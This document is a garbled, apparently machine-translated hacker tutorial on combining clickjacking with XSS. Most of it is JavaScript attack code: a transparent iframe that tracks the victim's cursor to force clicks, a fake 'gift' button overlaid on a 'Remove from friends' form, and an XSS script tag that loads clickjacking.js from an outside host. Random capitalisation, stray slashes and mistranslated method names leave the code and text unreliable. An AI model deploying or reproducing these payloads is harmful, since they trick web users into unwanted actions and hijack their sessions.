The combination of Clickjacking and XSS

----- [0x01: Overview]
Clickjacking attacks come from two recently discovered researchers, Jerry grorosman and Robert "RSnake" Hansen. This is a simple and effective attack.
We will quickly analyze how to combine two different XSS and Clickjacking to make the attack more effective.
Certificate ----------------------------------------------------------------------------------------------------------------------------------
 
 
----- [0x02: JavaScript always loves us]
Of course, we will use some JavaScript code to complete our attack plans, especially to try two different methods:
-0x02a = create the following IFRAME, and the user will be forced to click it;
 
-0x02b = create some specialized HTML code to overwrite some other webpages.
Certificate ----------------------------------------------------------------------------------------------------------------------------------
 
 
------ [0x02a: cursor tracking]
For the first Clickjacking attack, we need to prepare to name it "Cursor tracking": We will use JavaScript to create a trap IFRAME.
 
Now we can write the code to deploy the Clickjacking attack: All we need to do is let the user click a specific button or link, which will force him to make some actions, carefully designed hidden IFRAME will be loaded on the website.
 
First, prepare the IFRAME code. We will load the code and click:

<Iframe id = "victim" src = "http://target.com/page.php" scrolling = "no"
Style = "opacity: 0; position: absolute; left: 10; bottom: 10 ;"
Width = "500px;"> </iframe>
 
In this simple IFRAME statement, we must ensure that the "scrolling" function is disabled and the "opacity" attribute is set to 0 to construct a webpage hidden victim. The position of the IFRAME in the page depends on which user should click. You may want to fix it:
 
Margin-top: X;
Margin-left: X;
 
Using Negative values, you will get more and more pages centered on IFRAME.
 
The next step is to prepare a JavaScript function so that we can inject code into the IFRAME to track the webpage where the user cursor is located, and we can get it as expected. The following is the event handle used.
 
Function getPosition (e ){
E = e | window. event;
Var cursor = {x: 0, y: 0 };
If (e. pageX | e. pageY ){
Cursor. x = e. pageX;
Cursor. y = e. pageY;
} Else {
Var de = document.doc umentElement;
Var B = document. body;
Cursor. x = e. clientX + (de. scrollLeft | B. scrollLeft )-/
(De. clientLeft | 0 );
Cursor. y = e. clientY + (de. scrollTop | B. scrollTop )-/
(De. clientTop | 0 );
}

Return cursor;
}
 
This function retrieves the X and Y coordinates of each call from the webpage where the user's cursor is located.
 
Function clickjacking (e ){
Var loadFrame = document. getElementByIdx ("victim ");
Var curPos = getPosition (e );
LoadFrame. setAttribute ('style', 'opacity: 0; position: absolute; top :'/
+ (CurPos. y-80) + '; left:' + (curPos. x-15) + ';');
}
 
Similarly, this item loads IFRAME, calls the previous "getPosition" function, and changes the attribute to load the new coordinates in IFRAME to retrieve the cursor tracking function.
 
Window. captureEvents (Event. MOUSEMOVE );
Window. onmousemove = clickjacking;
 
This will call the MouseMove event handler so that the "clickjacking" function calls the webpage in which each user moves the cursor. As in our current JavaScript code, we create an IFRAME to make the webpage where the victim's cursor is located and force him to click a specific button.
 
Now let's output JavaScript to the HTML code document. write in IFRAME:
 
Document. write ("<iframe id = \" victim \ "src = \" http://target.com/page.php \"
Scrolling = \ "no \" style = \ "opacity: 0; position: absolute; left: 10; bottom: 10 ;\"
Width = \ "500px; \"> </iframe> ");
 
Such IFRAME code will be output to vulnerable web pages. We need to include our XSS attack media as soon as possible.
 
Our JavaScript code is as follows:
 
<! -- Clickjacking. js -->
Function getPosition (e ){
E = e | window. event;
Var cursor = {x: 0, y: 0 };
 
If (e. pageX | e. pageY ){
Cursor. x = e. pageX;
Cursor. y = e. pageY;
} Else {
Var de = document.doc umentElement;
Var B = document. body;
Cursor. x = e. clientX + (de. scrollLeft | B. scrollLeft )-/
(De. clientLeft | 0 );
Cursor. y = e. clientY + (de. scrollTop | B. scrollTop )-/
(De. clientTop | 0 );
}

Return cursor;
}
 
Function clickjacking (e ){
Var loadFrame = document. getElementByIdx ("victim ");
Var curPos = getPosition (e );
LoadFrame. setAttribute ('style', 'opacity: 0; position: absolute; top: '+/
(CurPos. y-80) + '; left:' + (curPos. x-15) + ';');
}
 
Window. captureEvents (Event. MOUSEMOVE );
Window. onmousemove = clickjacking;
 
Document. write ("<iframe id = \" victim \ "src = \" http: // www.2cto.com/page. php \"/
Scrolling = \ "no \" style = \ "opacity: 0; position: absolute; left: 10; bottom: 10 ;\"/
Width = \ "500px; \"> </iframe> ");
Certificate ----------------------------------------------------------------------------------------------------------------------------------
 
 
------ [0x02b: graphic overwrite]
Another method is to create some HTML code to inject the webpage image, replace it with a false one, and invite users to click on it.
 
For example, our victim accesses a website with a code that allows him to delete his friends:
 
<Form method = "POST" name = "friends" action = "remove. php">
<Div> Xiao Ming </div>
<Input type = "hidden" name = "friendid" value = "123456"/>
<Input type = "submit" value = "Remove from friends"/>
</Form>
 
We want to force the user to delete "Xiao Ming". The JavaScript code we finally developed is as follows:
 
<! -- Clickjacking. js -->
Function bonus (){
Document. friends. submit ();
}
Document. write ("<div style = \" position: absolute; top: Ypx; left: Xpx; \ "> <input/
Type = button value = \ "Your friend sent you a gift, get it! \ "OnClick = \" javascript: bonus ()\"/
/> </Div> ");
 
This creates a button that overwrites the X and Y coordinates, and overwrites the "Remove from friends" button so that it is concealed to the user.
 
This is just an example, indicating that it can be used to override the technology. The other can replace the original login form and locate the TOP and LEFT style attributes on the webpage.
Certificate ----------------------------------------------------------------------------------------------------------------------------------
 
 
----- [0x03: XSS finished!]
Assuming that the same web page is used by our victims to access () very vulnerable to cross-site scripting, we can inject our JavaScript code for forgery to deploy our XSS-Clickjacking, almost all victims will fall.
 
<Script src = http: // www.2cto.com/clickjacking. js> </script>
 
This is our XSS carrier. We should use JavaScript code to execute the victim's browser: injection can be done, because we have seen that through a url get parameter or user input form.
 
"Obviously, an XSS vulnerability requires some previous spread. In order for victims to discover malicious links, they should get what they want ."
Certificate ----------------------------------------------------------------------------------------------------------------------------------
 
 
----- [0x04: Conclusion]
This Clickjacking is a very interesting attack technology to obtain better cross-site scripting security vulnerabilities.
 
The most interesting thing about this attack is that it leaves a lot of space for attackers to exert their creativity, so that they can better express the lofty art of enticing online users.
 
If possible, you have created a new or more intelligent attack method, you can invite me to share it together --> Hack01 [at] Live {dot} cn
 
# The HacKeR NetSpy [czy]